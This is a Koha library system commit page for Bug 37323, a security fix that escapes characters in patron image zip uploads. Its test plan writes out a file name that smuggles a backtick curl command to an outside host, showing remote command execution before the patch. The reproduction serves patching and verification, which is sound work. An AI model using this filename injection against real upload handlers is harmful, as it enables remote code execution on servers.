]> git.koha-community.org Git - koha.git/commit
Bug 37323: Escape characters in patron image picture upload
authorAmit Gupta <amit.gupta@informaticsglobal.com>
Thu, 11 Jul 2024 17:43:06 +0000 (23:13 +0530)
committerTomas Cohen Arazi <tomascohen@theke.io>
Tue, 13 Aug 2024 05:03:18 +0000 (02:03 -0300)
commitb824756407eeeec5ad6e1d55d9b1c17de495b041
tree4bf609a9e16e43953ff9a657092fdf68f064b2a2
parentf340b66acca5a188b0ef3177c745af5b70b24aaa
Bug 37323: Escape characters in patron image picture upload

To Test
1. Create a file name for example: test.zip`curl xxxxtesting.informaticsglobal.com`.zip
   where the domain is one you can watch the logs from.
2. Go to Tools and click on Upload patron images choose option zip file and upload the file.
3. Check /var/log/apache2/access.log and see the curl with the IP
   "xx.xxx.xx.xxx - - [11/Jul/2024:23:10:33 +0530] "GET / HTTP/1.1" 200 267 "-" "curl/7.68.0"
4. Apply the patch
5. Repeat 2 and 3 step and check no error is coming for the Remote execution error.
6. Test uploading actual zip file and images still works.

Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
tools/picture-upload.pl